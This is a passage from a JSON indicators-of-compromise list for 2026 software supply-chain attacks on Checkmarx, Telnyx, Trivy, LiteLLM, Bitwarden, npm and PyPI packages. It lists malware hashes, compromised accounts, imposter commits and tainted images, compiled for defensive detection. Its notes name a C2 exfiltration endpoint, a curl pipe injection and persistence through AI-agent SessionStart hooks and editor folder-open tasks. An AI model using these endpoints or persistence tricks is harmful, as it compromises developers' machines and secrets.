"checkmarx-ast-scanner-2026.5.09.hpi (malicious)",
"incident": "checkmarx-jenkins"},
{"value":
"f50a96d26a5b0beb29de4127e82b2bf350c21511e5a43d286e43f798dc6cd53f",
"type": "sha256", "note":
"checkmarx-ast-scanner-2026.5.09.jar (injected)",
"incident": "checkmarx-jenkins"},
{"value":
"3ddb8967919a801b3c383e58cddceab21138134c6a26560d99e2672e86f36f2a",
"type": "sha256", "note":
"checkmarx-ast-scanner-2026.5.09.pom", "incident":
"checkmarx-jenkins"},
{"value": "85487e68fc46fe3faec2617ac4f2ee5d",
"type": "md5", "note":
"checkmarx-ast-scanner.hpi v2026.5.09 (malicious)",
"incident": "checkmarx-jenkins"},
{"value": "1ac56ecda9a255c23eabd70c276905a0",
"type": "md5", "note":
"checkmarx-ast-scanner.jar (injected)", "incident":
"checkmarx-jenkins"},
{"value": "9f9f83795fc162b7e44bc6859fc80535",
"type": "md5", "note": "cli.js credential
stealer", "incident": "checkmarx-jenkins"},
{"value": "HeyEveryoneCheckmarxIsNotGonnaMakeIt",
"type": "string", "note": "Commit message
prefix for exfiltration", "incident": "checkmarx-jenkins"},
{"value": "/tmp/tmp.checkmarx_tracker.lock",
"type": "filepath", "note": "Lock file
(active infection indicator)", "incident": "checkmarx-jenkins"},
{"value": "~/hugs_from_teamPCP.txt",
"type": "filepath", "note": "Goodbye message
written on exception", "incident": "checkmarx-jenkins"}
],
"telnyx_packages": [
{"value":
"7321caa303fe96ded0492c747d2f353c4f7d17185656fe292ab0a59e2bd0b8d9",
"note": "telnyx-4.87.1.whl", "source":
"Hexastrike", "incident": "telnyx"},
{"value":
"f66c1ea3b25ec95d0c6a07be92c761551e543a7b256f9c78a2ff781c77df7093",
"note": "telnyx-4.87.1.tar.gz", "source":
"Hexastrike", "incident": "telnyx"},
{"value":
"cd08115806662469bbedec4b03f8427b97c8a4b3bc1442dc18b72b4e19395fe3",
"note": "telnyx-4.87.2.whl", "source":
"Hexastrike", "incident": "telnyx"},
{"value":
"a9235c0eb74a8e92e5a0150e055ee9dcdc6252a07785b6677a9ca831157833a5",
"note": "telnyx-4.87.2.tar.gz", "source":
"Hexastrike", "incident": "telnyx"}
],
"telnyx_malware": [
{"value":
"23b1ec58649170650110ecad96e5a9490d98146e105226a16d898fbe108139e5",
"note": "_client.py v4.87.1", "source":
"Hexastrike", "incident": "telnyx"},
{"value":
"ab4c4aebb52027bf3d2f6b2dcef593a1a2cff415774ea4711f7d6e0aa1451d4e",
"note": "_client.py v4.87.2", "source":
"Hexastrike", "incident": "telnyx"},
{"value":
"84edce66f09c55bbb44754411bde4b092288d172734df62fac20d6f794b3a2ec",
"note": "Linux Stage 2 loader (base64 decoded)",
"source": "Hexastrike", "incident":
"telnyx"},
{"value":
"5ce544a8db5d0b0953c966384858e4e8a017e7acba2f5f6d0ac8f529d59939d8",
"note": "Stage 3 credential harvester", "source":
"Hexastrike", "incident": "telnyx"},
{"value":
"196b5e0e06424a02e360e28e08d7dcfab7ec8946af9477ca352c6cf6b7d4e9bd",
"note": "Inner PE RAT (extracted)", "source":
"Hexastrike", "incident": "telnyx"},
{"value":
"e6912e3ec58120bf63edf2e4be6ff2f092c40cfbc655a12f4a463b2ef98d368e",
"note": "Embedded PNG steganography", "source":
"Hexastrike", "incident": "telnyx"},
{"value":
"e4e3b176c1255666024d90392e09466a23bf6e8740bf589c6d1ccf2dfff451a4",
"note": "Reflective PE loader shellcode",
"source": "Hexastrike", "incident":
"telnyx"}
],
"canisterworm_malware": [
{"value":
"e9b1e069efc778c1e77fb3f5fcc3bd3580bbc810604cbf4347897ddb4b8c163b",
"note": "index.js variant", "incident":
"canisterworm"},
{"value":
"61ff00a81b19624adaad425b9129ba2f312f4ab76fb5ddc2c628a5037d31a4ba",
"note": "index.js variant", "incident":
"canisterworm"},
{"value":
"0c0d206d5e68c0cf64d57ffa8bc5b1dad54f2dda52f24e96e02e237498cb9c3a",
"note": "index.js variant", "incident":
"canisterworm"},
{"value":
"c37c0ae9641d2e5329fcdee847a756bf1140fdb7f0b7c78a40fdc39055e7d926",
"note": "index.js variant", "incident":
"canisterworm"},
{"value":
"f398f06eefcd3558c38820a397e3193856e4e6e7c67f81ecc8e533275284b152",
"note": "deploy.js variant", "incident":
"canisterworm"},
{"value":
"7df6cef7ab9aae2ea08f2f872f6456b5d51d896ddda907a238cd6668ccdc4bb7",
"note": "deploy.js variant", "incident":
"canisterworm"},
{"value":
"5e2ba7c4c53fa6e0cef58011acdd50682cf83fb7b989712d2fcf1b5173bad956",
"note": "deploy.js variant", "incident":
"canisterworm"}
],
"staging_server_malware": [
{"value":
"81eda518ff6ebb25e6aa8d626b78cd2eb6cb38b5d7efb34e021289e76993414b",
"note": "MidwestGrey.exe (Windows PE dropper)",
"source": "LloydLabs", "incident":
"attacker"},
{"value":
"ea47cebe2fbbf06c22b9bd9b9d72dd4fe64aed4e68675aa5e693312a773e09e9",
"note": "kfhogts (Python trojan bundle)",
"source": "LloydLabs", "incident":
"attacker"}
],
"windows_payload": [
{"value":
"7290353a3bc2b18e9ea574d3294b09e28edaa6b038285bb101cf09760f187dcd",
"note": "msbuild.exe (outer PE)", "source":
"HackingLZ", "incident": "telnyx"},
{"value":
"dafc1cc5d39bc303562d8587b698b6351e843b77c01764efa8b423a36b88fa6d",
"note": "file.dll (AdaptixC2 beacon)", "source":
"HackingLZ", "incident": "telnyx"},
{"value":
"7e270255567866d37ad56e3f06977b695e39530eede74a10a0848ba71560cb45",
"note": "embedded PNG (stego)", "source":
"HackingLZ", "incident": "telnyx"},
{"value":
"b92bd082bbd7d238089b2bb87d9cbf01be1bf8ab7213b67e9d27108e052ef75c",
"note": "shellcode (loader + DLL)", "source":
"HackingLZ", "incident": "telnyx"},
{"value":
"26b689749bc57991cbae2aab8ab6cf5acab6c64db4829ba2b1ced6c60d99a7a8",
"note": "reflective loader stub", "source":
"HackingLZ", "incident": "telnyx"}
],
"certificates": [
{"value":
"30015dd1e2cf4dbd49fff9ddef2ad4622da2e60e5c0b6228595325532e948f14",
"note": "Self-signed certificate", "source":
"Unit42", "incident": "attacker"},
{"value":
"41c4f2f37c0b257d1e20fe167f2098da9d2e0a939b09ed3f63bc4fe010f8365c",
"note": "Self-signed certificate", "source":
"Unit42", "incident": "attacker"},
{"value":
"d8caf4581c9f0000c7568d78fb7d2e595ab36134e2346297d78615942cbbd727",
"note": "Self-signed certificate", "source":
"Unit42", "incident": "attacker"}
],
"kics_docker_april": [
{"value":
"24680027afadea90c7c713821e214b15cb6c922e67ac01109fb1edb3ee4741d9",
"note": "mcpAddon.js", "source":
"Socket", "incident": "kics-docker"},
{"value":
"2a6a35f06118ff7d61bfd36a5788557b695095e7c9a609b4a01956883f146f50",
"note": "kics ELF binary", "source":
"Socket", "incident": "kics-docker"}
],
"kics_docker_digests": [
{"value":
"sha256:2588a44890263a8185bd5d9fadb6bc9220b60245dbcbc4da35e1b62a6f8c230d",
"note": "Alpine index manifest", "source":
"Docker", "incident": "kics-docker"},
{"value":
"sha256:222e6bfed0f3bb1937bf5e719a2342871ccd683ff1c0cb967c8e31ea58beaf7b",
"note": "Debian index manifest", "source":
"Docker", "incident": "kics-docker"},
{"value":
"sha256:a0d9366f6f0166dcbf92fcdc98e1a03d2e6210e8d7e8573f74d50849130651a0",
"note": "Latest index manifest", "source":
"Docker", "incident": "kics-docker"}
],
"bitwarden_cli": [
{"value":
"18f784b3bc9a0bcdcb1a8d7f51bc5f54323fc40cbd874119354ab609bef6e4cb",
"note": "bw1.js (11.7 MB payload)", "source":
"N3mes1s", "incident": "bitwarden"},
{"value":
"f35475829991b303c5efc2ee0f343dd38f8614e8b5e69db683923135f85cf60d",
"note": "bw_setup.js (loader)", "source":
"N3mes1s", "incident": "bitwarden"},
{"value":
"8605e365edf11160aad517c7d79a3b26b62290e5072ef97b102a01ddbb343f14",
"note": "second-stage payload", "source":
"JFrog", "incident": "bitwarden"},
{"value":
"167ce57ef59a32a6a0ef4137785828077879092d7f83ddbc1755d6e69116e0ad",
"note": "package.json root metadata", "source":
"JFrog", "incident": "bitwarden"}
],
"mini_shai_hulud_dropper": [
{"value":
"4066781fa830224c8bbcc3aa005a396657f9c8f9016f9a64ad44a9d7f5f45e34",
"note": "setup.mjs (shared dropper)", "source":
"Socket", "incident": "mini-shai-hulud"}
],
"mini_shai_hulud_sap": [
{"value":
"eb6eb4154b03ec73218727dc643d26f4e14dfda2438112926bb5daf37ae8bcdb",
"note": "execution.js (@cap-js/postgres)",
"source": "Socket", "incident":
"mini-shai-hulud"},
{"value":
"1d9e4ece8e13c8eaf94cb858470d1bd8f81bb58f62583552303774fa1579edee",
"note": "@cap-js/postgres-2.2.2.tgz", "source":
"Wiz", "incident": "mini-shai-hulud"},
{"value":
"6f933d00b7d05678eb43c90963a80b8947c4ae6830182f89df31da9f568fea95",
"note": "execution.js (@cap-js/sqlite)",
"source": "Aikido", "incident":
"mini-shai-hulud"},
{"value":
"a1da198bb4e883d077a0e13351bf2c3acdea10497152292e873d79d4f7420211",
"note": "@cap-js/sqlite-2.2.2.tgz", "source":
"Wiz", "incident": "mini-shai-hulud"},
{"value":
"258257560fe2f1c2cc3924eae40718c829085b52ae3436b4e46d2565f6996271",
"note": "@cap-js/db-service-2.10.1.tgz",
"source": "Wiz", "incident":
"mini-shai-hulud"},
{"value":
"80a3d2877813968ef847ae73b5eeeb70b9435254e74d7f07d8cf4057f0a710ac",
"note": "execution.js (mbt)", "source":
"Socket", "incident": "mini-shai-hulud"},
{"value":
"86282ebcd3bebf50f087f2c6b00c62caa667cdcb53558033d85acd39e3d88b41",
"note": "mbt-1.2.48.tgz", "source":
"Wiz", "incident": "mini-shai-hulud"},
{"value":
"29ac906c8bd801dfe1cb39596197df49f80fff2270b3e7fbab52278c24e4f1a7",
"note": "memory dumper (Runner.Worker)",
"source": "Aikido", "incident":
"mini-shai-hulud"}
],
"mini_shai_hulud_intercom": [
{"value":
"50212a875643520353df158196b9b3be4595094125ad8d2d2c48bdd9cb04ce1f",
"note": "router_runtime.js (intercom-php)",
"source": "Socket", "incident":
"mini-shai-hulud"},
{"value":
"832a976d1a8d54e296e8479aedbd89fa24baa02b8409a78bf06d4d03340881bd",
"note": "setup-intercom.sh", "source":
"Socket", "incident": "mini-shai-hulud"},
{"value":
"b084743bd16043461e68b604dde80a8b386b405eae6f66c1103fb4fd6831d4a7",
"note": "composerPlugin.php", "source":
"Socket", "incident": "mini-shai-hulud"},
{"value":
"66664a49edbcee0ed0d8365839707916e92d3aa06e7f26f33c9dcc58e5fc1ef3",
"note": "intercom-intercom-php-5.0.2.zip",
"source": "Socket", "incident":
"mini-shai-hulud"},
{"value":
"907aec5b1288057a3e0885226918b6930a62a0f348ce23de026a683238c7903e",
"note": "composer.json (intercom-php)", "source":
"Socket", "incident": "mini-shai-hulud"}
],
"mini_shai_hulud_lightning": [
{"value":
"5f5852b5f604369945118937b058e49064612ac69826e0adadca39a357dfb5b1",
"note": "router_runtime.js (lightning 2.6.2/2.6.3)",
"source": "Lightning.ai", "incident":
"mini-shai-hulud"},
{"value":
"8046a11187c135da6959862ff3846e99ad15462d2ec8a2f77a30ad53ebd5dcf2",
"note": "start.py (loader)", "source":
"Lightning.ai", "incident": "mini-shai-hulud"}
],
"mini_shai_hulud_persistence": [
{"value":
"14eb4ce01dd4307759887ff819359b70d7d9ff709ecde039a5abc1aac325b128",
"note": ".claude/settings.json (SessionStart hook)",
"source": "Wiz", "incident":
"mini-shai-hulud"},
{"value":
"927387d0cfac1118df4b383decc2ea6ba49c9d2f98b47098bcbcba1efc026e1f",
"note": ".vscode/tasks.json (folderOpen task)",
"source": "Wiz", "incident":
"mini-shai-hulud"}
],
"xinference_packages": [
{"value":
"9d5bf42dedbefee145b9b3704d26b54668fd856f990299ec64f6b45b18e3f0bf",
"note": "xinference-2.6.0-py3-none-any.whl",
"incident": "xinference"},
{"value":
"96938e023f9ab0e963201522729a77e826b7bf336b1e5c972be76f8438ea4c1b",
"note": "xinference-2.6.1-py3-none-any.whl",
"incident": "xinference"},
{"value":
"06c88b286610e397ad22b8453b75ebf1e7bfe3b22c558577e17c39f21ef78a9c",
"note": "xinference-2.6.2-py3-none-any.whl",
"incident": "xinference"}
],
"mini_shai_hulud_2_malware": [
{"value":
"ab4fcadaec49c03278063dd269ea5eef82d24f2124a8e15d7b90f2fa8601266c",
"note": "router_init.js (2,341,681 bytes)",
"incident": "mini-shai-hulud-2"},
{"value":
"2ec78d556d696e208927cc503d48e4b5eb56b31abc2870c2ed2e98d6be27fc96",
"note": "router_init.js (2,339,346 bytes)",
"incident": "mini-shai-hulud-2"},
{"value":
"2258284d65f63829bd67eaba01ef6f1ada2f593f9bbe41678b2df360bd90d3df",
"note": "setup.mjs (5,047 bytes)", "incident":
"mini-shai-hulud-2"},
{"value":
"7c12d8614c624c70d6dd6fc2ee289332474abaa38f70ebe2cdef064923ca3a9b",
"note": "@tanstack/setup malicious package",
"source": "Mistral", "incident":
"mini-shai-hulud-2"},
{"value":
"6dbaa43bf2f3c0d3cddbca74967e952da563fb974c1ef9d4ecbb2e58e41fe81b",
"note": "mistralai-2.4.6.tar.gz (malicious sdist)",
"source": "Mistral GHSA", "incident":
"mini-shai-hulud-2"}
],
"mini_shai_hulud_2_persistence": [
{"value": "src/mistralai/client/__init__.py",
"type": "filepath", "note": "PyPI injection
point", "incident": "mini-shai-hulud-2"},
{"value": "/tmp/transformers.pyz", "type":
"filepath", "note": "downloaded payload path",
"incident": "mini-shai-hulud-2"},
{"value": "MISTRAL_INIT=1", "type":
"envvar", "note": "execution guard",
"incident": "mini-shai-hulud-2"}
],
"cemu_releases": [
{"value":
"0f35abda19fb69430c32228465396094b866d887427bf551e353ab31256a9dd6",
"note": "Cemu v2.6 AppImage (malicious)",
"source": "Datadog", "incident":
"cemu"},
{"value":
"d07a29c4458d00e42d5d9e6345932592e91644d6b821bacdb7a543c628e0b41a",
"note": "Cemu v2.6 AppImage binary", "source":
"Datadog", "incident": "cemu"},
{"value":
"f140e76236b96adf7cdc796227af9808665143bc674debb77729fa3e4b8327cc",
"note": "Cemu v2.6 Ubuntu zip (malicious)",
"source": "Datadog", "incident":
"cemu"},
{"value":
"1bf72f05191d849049d4a38fced2277ac5cfc54b7ae591f564e7a14add7c886d",
"note": "startup.pyz (Ubuntu variant)", "source":
"Datadog", "incident": "cemu"}
],
"cemu_persistence": [
{"value": "/tmp/.transformers", "type":
"filepath", "note": "two-stage execution sentinel
file", "incident": "cemu"},
{"value": "83.142.209.194/v1/weights",
"type": "url", "note": "C2 exfil
endpoint", "incident": "cemu"},
{"value": "python_mistral_cemu_files/",
"type": "filepath", "note": "payload module
directory in startup.pyz", "incident": "cemu"}
],
"antv_vscode": [
{"value":
"1a4afce34918bdc74ae3f31edaffffaa0ee074d83618f53edfd88137927340b8",
"note": "[email protected] VSIX",
"source": "StepSecurity", "incident":
"antv"},
{"value":
"b0cefb66b953e5184b6adb3035e9e267335ac5eabfe1848e07834777b9397b74",
"note": "malicious main.js", "source":
"StepSecurity", "incident": "antv"},
{"value":
"e7347d90653efc565f03733a95e9209d78f9cfa81e31ff2b2dd9d48d75a4b8b1",
"note": "obfuscated payload (index.js)",
"source": "StepSecurity", "incident":
"antv"},
{"value":
"43f2b001846c4966073ebffa5be8f15e491a1e7d32bbd805d57406ff540e0dd9",
"note": "dropper package.json", "source":
"StepSecurity", "incident": "antv"},
{"value":
"228a2cf081d4cbea9b91cde14a8f9c4a4d003e7f32431496953fd6bac266f5a3",
"note": "clean v18.94.0 (reference)", "source":
"StepSecurity", "incident": "antv"},
{"value":
"cb86f4f223daa54467c7782a0d8607e9c84e2bb633e6f0e51d9a19579e200990",
"note": "remediated v18.100.0", "source":
"StepSecurity", "incident": "antv"}
],
"antv_backdoor": [
{"value":
"fb5c97557230a27460fdab01fafcfabeaa49590bafd5b6ef30501aa9e0a51142",
"note": "~/.local/share/kitty/cat.py (SHA-256)",
"source": "Wiz", "incident": "antv"},
{"value":
"783b4019fc5b942a29846132d28441c8fc31bed8", "type":
"sha1", "note": "~/.local/share/kitty/cat.py",
"source": "Wiz", "incident": "antv"},
{"value": "b06b126b9e26af03a7ef2f8b8e90d446",
"type": "md5", "note":
"~/.local/share/kitty/cat.py", "source": "Wiz",
"incident": "antv"}
],
"antv_npm_payload": [
{"value":
"a68dd1e6a6e35ec3771e1f94fe796f55dfe65a2b94560516ff4ac189390dfa1c",
"note": "index.js payload (486-498KB obfuscated Bun
bundle)", "source": "SafeDep", "incident":
"antv"}
],
"durabletask_packages": [
{"value":
"7d80b3ef74ad7992b93c31966962612e4e2ceb93e7727cdbd1d2a9af47d44ba8",
"note": "durabletask-1.4.1", "source":
"Wiz", "incident": "durabletask"},
{"value":
"aeaf583e20347bf850e2fabdcd6f4982996ba023f8c2cd56bbd299cfd56516f5",
"note": "durabletask-1.4.2", "source":
"Wiz", "incident": "durabletask"},
{"value":
"877ff2531a63393c4cb9c3c86908b62d9c4fc3db971bc231c48537faae6cb3ec",
"note": "durabletask-1.4.3", "source":
"Wiz", "incident": "durabletask"}
],
"durabletask_malware": [
{"value":
"069ac1dc7f7649b76bc72a11ac700f373804bfd81dab7e561157b703999f44ce",
"note": "rope.pyz payload", "source":
"Wiz", "incident": "durabletask"}
],
"miasma_packages": [
{"value":
"88896d478986d453f5da79b311de39d9b4b1bea95c21af1d8ef181b0f4e52fe9",
"note": "@redhat-cloud-services/[email protected] tarball",
"source": "Socket", "incident":
"miasma"}
],
"miasma_malware": [
{"value":
"21b6409a7b84446310daca5409ad6112ac60a1e4bef97736e53fff5f63bfdef4",
"note": "index.js (obfuscated loader)", "source":
"Socket", "incident": "miasma"},
{"value":
"0dc06ecdaa63fe24859cfd955053c23245c536e4733480239d14bebf12688e35",
"note": "decrypted main payload", "source":
"Socket", "incident": "miasma"}
],
"miasma_persistence": [
{"value": ".claude/settings.json", "type":
"filepath", "note": "SessionStart hook →
.github/setup.js", "source": "BoostSecurity", "incident":
"miasma"},
{"value": ".vscode/tasks.json", "type":
"filepath", "note": "runOn: folderOpen task",
"source": "BoostSecurity", "incident":
"miasma"},
{"value": ".github/setup.js", "type":
"filepath", "note": "4.2 MB offline loader (4,215,480
bytes)", "source": "BoostSecurity", "incident":
"miasma"}
],
"elementary_data_packages": [
{"value":
"d37874c6c8a2d2a7a252810a1999ece8bb39e9b3ab2b7e8bf40da15bd36a1584",
"note": "elementary.pth (46 KB loader)",
"source": "Trend Micro", "incident":
"elementary-data"},
{"value":
"83f9b178b520d3ad8b49bc9ea2b454eacf64fc302ec42aff6f90a1245af299e9",
"note": "elementary-data-0.23.3 variant",
"source": "OSV", "incident":
"elementary-data"},
{"value":
"96dc65f67f54411d3de6b23a33a8f73665e2703d7261b7f1720cdc089c528eea",
"note": "elementary-data-0.23.3 variant",
"source": "OSV", "incident":
"elementary-data"},
{"value":
"fcb538f8a937dd2e97532899be80827772aa99f0523c582aef301682d6e96b75",
"note": "elementary-data-0.23.3 variant",
"source": "OSV", "incident":
"elementary-data"},
{"value":
"cc802c0d8b918c99b39f26f473e8090b7073d45268b399df2e2ff5d5549c2a37",
"note": "elementary-data-0.23.3 variant",
"source": "OSV", "incident":
"elementary-data"},
{"value":
"0bf22f5de2169f2f614c12aaecf586fd7a203cff41f4b79583963a30660a7019",
"note": "elementary-data-0.23.3 variant",
"source": "OSV", "incident":
"elementary-data"}
],
"elementary_data_artifacts": [
{"value":
"b1e4b1f3aad0d489ab0e9208031c67402bbb8480", "type":
"sha1", "note": "forged orphan Git commit",
"source": "StepSecurity", "incident":
"elementary-data"},
{"value":
"sha256:31ecc5939de6d24cf60c50d4ca26cf7a8c322db82a8ce4bd122ebd89cf634255",
"type": "digest", "note":
"ghcr.io/elementary-data/elementary:0.23.3 (malicious)",
"source": "Trend Micro", "incident":
"elementary-data"}
]
},
"github":
{
"imposter_commits": [
{"value": "actions/checkout @ 70379aad",
"url":
"https://github.com/actions/checkout/commit/70379aad1a8b40919ce8b382d3cd7d0315cde1d0",
"note": "→ rauchg", "incident":
"trivy"},
{"value": "aquasecurity/trivy @ 1885610c",
"url":
"https://github.com/aquasecurity/trivy/commit/1885610c6a34811c8296416ae69f568002ef11ec",
"note": "→ DmitriyLewen", "incident":
"trivy"},
{"value": "aquasecurity/trivy-action @ ddb9da44",
"url":
"https://github.com/aquasecurity/trivy-action/commit/ddb9da4475c1cef7d5389062bdfdfbdbd1394648",
"incident": "trivy"}
],
"lateral_movement": [
{"value": "aquasecurity/tfsec @ a67fd5b5",
"url":
"https://github.com/aquasecurity/tfsec/commit/a67fd5b5b119",
"incident": "trivy"},
{"value": "aquasecurity/traceeshark @ 56591dfe",
"url":
"https://github.com/aquasecurity/traceeshark/commit/56591dfe113b",
"incident": "trivy"},
{"value": "aquasecurity/trivy-action @ 93ed4111",
"url":
"https://github.com/aquasecurity/trivy-action/commit/93ed41111017c3767fafc7d9cc8711f3be1a661f",
"incident": "trivy"},
{"value": "aquasecurity/setup-trivy @ 8afa9b9f",
"url":
"https://github.com/aquasecurity/setup-trivy/commit/8afa9b9f9183b4e00c46e2b82d34047e3c177bd0",
"note": "→ thara", "incident": "trivy"}
],
"checkmarx_actions": [
{"value": "Checkmarx/kics-github-action @ 121c38f",
"url":
"https://github.com/Checkmarx/kics-github-action/commit/121c38f",
"incident": "checkmarx"},
{"value": "Checkmarx/ast-github-action @ aa52a82c",
"url":
"https://github.com/Checkmarx/ast-github-action/commit/aa52a82cddf2fa5ad54a519a0a56fd430264dbbe",
"feedback": "Tunahan TEKEOĞLU", "incident":
"checkmarx"},
{"value": "Checkmarx/kics @ 22769adb",
"url":
"https://github.com/Checkmarx/kics/commit/22769adb159bb5954adea5074e9763e8376201b3",
"note": "Gato-X secrets exfil workflow",
"incident": "kics-docker"},
{"value": "Checkmarx/ast-github-action PR#307",
"url":
"https://github.com/Checkmarx/ast-github-action/pull/307",
"note": "curl audit.checkmarx.cx pipe injection",
"incident": "kics-docker"}
],
"litellm_exfil": [
{"value": "BerriAI/litellm @ fcaa823d",
"url":
"https://github.com/BerriAI/litellm/commit/fcaa823de07878d0d98e97f6f5552c0e2ac00d2f",
"note": "test.yml", "incident":
"litellm"},
{"value": "BerriAI/litellm-skills @ 81c851cc",
"url":
"https://github.com/BerriAI/litellm-skills/commit/81c851cc00313c44effd421712523f294b18391e",
"note": "test.yml", "incident":
"litellm"}
],
"tanstack_attack": [
{"value": "zblgg/configuration", "url":
"https://github.com/zblgg/configuration", "note":
"renamed fork of TanStack/router", "incident": "mini-shai-hulud-2"},
{"value":
"79ac49eedf774dd4b0cfa308722bc463cfe5885c", "note":
"malicious commit hash", "incident":
"mini-shai-hulud-2"}
],
"compromised_accounts": [
{"value": "aqua-bot", "note": "ID:
54269356 — Trivy", "incident": "trivy"},
{"value": "Argon-DevOps-Mgt", "note":
"ID: 139343333 — aquasec-com defacement", "incident":
"trivy"},
{"value": "cx-plugins-releases", "note":
"ID: 225848595 — KICS", "incident": "checkmarx"},
{"value": "octocommit", "note": "ID:
266895321 — f.k.a. DarkSeek3r, renamed Mar 10", "incident":
"trivy"},
{"value": "ast-phoenix", "note":
"OpenVSX publisher", "incident": "checkmarx"},
{"value": "aDrupont4191", "note":
"Bitwarden CLI attack — deleted", "incident":
"bitwarden"},
{"value": "XprobeBot", "note": "PyPI
bot account — xinference (disputed)", "incident":
"xinference"},
{"value": "zblgg", "note": "ID:
127806521 — TanStack attack fork account", "incident":
"mini-shai-hulud-2"},
{"value": "voicproducoes", "note":
"ID: 269549300 — supply chain operator", "source":
"Hunt.io", "incident": "mini-shai-hulud-2"},
{"value": "atool", "note": "npm
maintainer account — AntV", "incident": "antv"},
{"value": "realtungtungtungsahur", "note":
"created Apr 22 — elementary-data script injection",
"incident": "elementary-data"}
],
"antv_imposter_commits": [
{"value": "antvis/G2 @
1916faa365f2788b6e193514872d51a242876569", "url":
"https://github.com/antvis/G2/commit/1916faa365f2788b6e193514872d51a242876569",
"note": "orphan commit (626 versions)",
"incident": "antv"},
{"value": "antvis/G2 @
7cb42f57561c321ecb09b4552802ae0ac55b3a7a", "url":
"https://github.com/antvis/G2/commit/7cb42f57561c321ecb09b4552802ae0ac55b3a7a",
"note": "orphan commit (2 versions)", "incident":
"antv"},
{"value": "antvis/G2 @
dc3d62a2181beb9f326952a2d212900c94f2e13d", "url":
"https://github.com/antvis/G2/commit/dc3d62a2181beb9f326952a2d212900c94f2e13d",
"note": "orphan commit (1 version, garbage-collected)",
"incident": "antv"}
],
"antv_vscode_commits": [
{"value":
"558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2", "note":
"Nx Console orphan commit", "incident": "antv"},
{"value":
"ba642fe2c7c65e42dd7f6444b83023dc6827e08c", "note":
"commit tree", "incident": "antv"},
{"value":
"acfc3f957a63b4cde93ff645f2b6bf26a8ed1bbf", "note":
"index.js blob", "incident": "antv"},
{"value":
"9d88f040c44b5f4d5f9db15ff89310776c168e99", "note":
"package.json blob", "incident": "antv"}
],
"antv_actions": [
{"value": "actions-cool/issues-helper",
"note": "53 tags compromised (19:10:24-19:13:40 UTC)",
"incident": "antv"},
{"value": "actions-cool/maintain-one-comment",
"note": "15 tags compromised (19:30:30-19:31:09 UTC)",
"incident": "antv"},
{"value":
"1c9e803c80cc7fed000022d4c94f4b5bc2e90062", "note":
"issues-helper v3.8.0 malicious commit", "incident":
"antv"},
{"value":
"f0448c62fc57b8a5ce23d8acd6e795cdd76a3b6c", "note":
"issues-helper v3.7.6 malicious commit", "incident":
"antv"},
{"value":
"b9c83f01929e190cda300e76f688bf7ea7e37a7a", "note":
"issues-helper v3.0.0 malicious commit", "incident":
"antv"}
],
"container_images": [
{"value": "ghcr.io/aquasecurity/trivy:0.69.4",
"note": "~3hr exposure", "incident":
"trivy"},
{"value": "docker.io/aquasec/trivy:0.69.4",
"note": "~3hr exposure", "incident":
"trivy"},
{"value":
"public.ecr.aws/aquasecurity/trivy:0.69.4", "note":
"~3hr exposure", "incident": "trivy"},
{"value": "docker.io/aquasec/trivy:0.69.5",
"note": "Mar 22", "incident": "trivy"},
{"value":
"sha256:f69a8a4180c43fc427532ddde34a256acbd041a0a07844cf7e4d3e0434e5bcd1",
"note": "aquasec/trivy:0.69.5 image digest",
"incident": "trivy"},
{"value": "docker.io/aquasec/trivy:0.69.6",
"note": "Mar 22", "incident": "trivy"},
{"value":
"sha256:dd8beb3b40df080b3fd7f9a0f5a1b02f3692f65c68980f46da8328ce8bb788ef",
"note": "aquasec/trivy:0.69.6 image digest",
"incident": "trivy"},
{"value": "docker.io/checkmarx/kics:latest",
"note": "Apr 22 ~1.5hr exposure", "incident":
"kics-docker"},
{"value": "docker.io/checkmarx/kics:v2.1.20",
"note": "Apr 22 overwritten", "incident":
"kics-docker"},
{"value": "docker.io/checkmarx/kics:v2.1.21",
"note": "Apr 22 new malicious tag", "incident":
"kics-docker"},
{"value": "docker.io/checkmarx/kics:alpine",
"note": "Apr 22 overwritten", "incident":
"kics-docker"},
{"value": "docker.io/checkmarx/kics:debian",
"note": "Apr 22 overwritten", "incident":
"kics-docker"},
{"value":
"ghcr.io/elementary-data/elementary:0.23.3", "note":
"Apr 24 ~11.5hr exposure", "incident":
"elementary-data"}
],
"pypi_packages": [
{"value": "litellm==1.82.7", "note":
"quarantined", "incident": "litellm"},
{"value": "litellm==1.82.8", "note":
"quarantined", "incident": "litellm"},
{"value": "telnyx==4.87.1", "note":
"malicious (Win bug)", "incident": "telnyx"},
{"value": "telnyx==4.87.2", "note":
"malicious", "incident": "telnyx"},
{"value": "xinference==2.6.0", "note":
"disputed TeamPCP attribution", "incident":
"xinference"},
{"value": "xinference==2.6.1", "note":
"disputed TeamPCP attribution", "incident":
"xinference"},
{"value": "xinference==2.6.2", "note":
"disputed TeamPCP attribution", "incident":
"xinference"},
{"value": "lightning==2.6.2", "note":
"PyTorch Lightning", "incident":
"mini-shai-hulud"},
{"value": "lightning==2.6.3", "note":
"PyTorch Lightning", "incident":
"mini-shai-hulud"},
{"value": "guardrails-ai==0.10.1", "note":
"Guardrails AI", "incident":
["mini-shai-hulud-2", "durabletask"]},
{"value": "durabletask==1.4.1", "note":
"Microsoft DurableTask SDK", "incident":
"durabletask"},
{"value": "durabletask==1.4.2", "note":
"Microsoft DurableTask SDK", "incident":
"durabletask"},
{"value": "durabletask==1.4.3", "note":
"Microsoft DurableTask SDK", "incident":
"durabletask"},
{"value": "mistralai==2.4.6", "note":
"Mistral AI Python client", "incident":
"mini-shai-hulud-2"},
{"value": "elementary-data==0.23.3",
"note": "~1.1M monthly downloads, ~11.5hr exposure",
"incident": "elementary-data"}
],
"npm_packages": [
{"value": "@EmilGroup/*", "note": "28
packages compromised", "incident": "canisterworm"},
{"value": "@opengov/*", "note": "16
packages compromised", "incident": "canisterworm"},
{"value": "@teale.io/[email protected]",
"note": "self-propagating variant", "incident":
"canisterworm"},
{"value": "@teale.io/[email protected]",
"note": "self-propagating variant", "incident":
"canisterworm"},
{"value": "@airtm/uuid-base32", "note":
"compromised", "incident": "canisterworm"},
{"value": "@pypestream/floating-ui-dom",
"note": "compromised", "incident":
"canisterworm"},
{"value": "@bitwarden/[email protected]",
"note": "cascading from KICS Docker", "incident":
"bitwarden"},
{"value": "[email protected]", "note":
"CanisterSprawl worm (Apr 21-22)", "incident":
"canistersprawl"},
{"value": "@automagik/[email protected]",
"note": "CanisterSprawl (Apr 21-22)", "incident":
"canistersprawl"},
{"value":
"@fairwords/[email protected]", "note":
"CanisterSprawl precursor (Apr 8)", "incident":
"canistersprawl"},
{"value": "@fairwords/[email protected]",
"note": "CanisterSprawl precursor (Apr 8)",
"incident": "canistersprawl"},
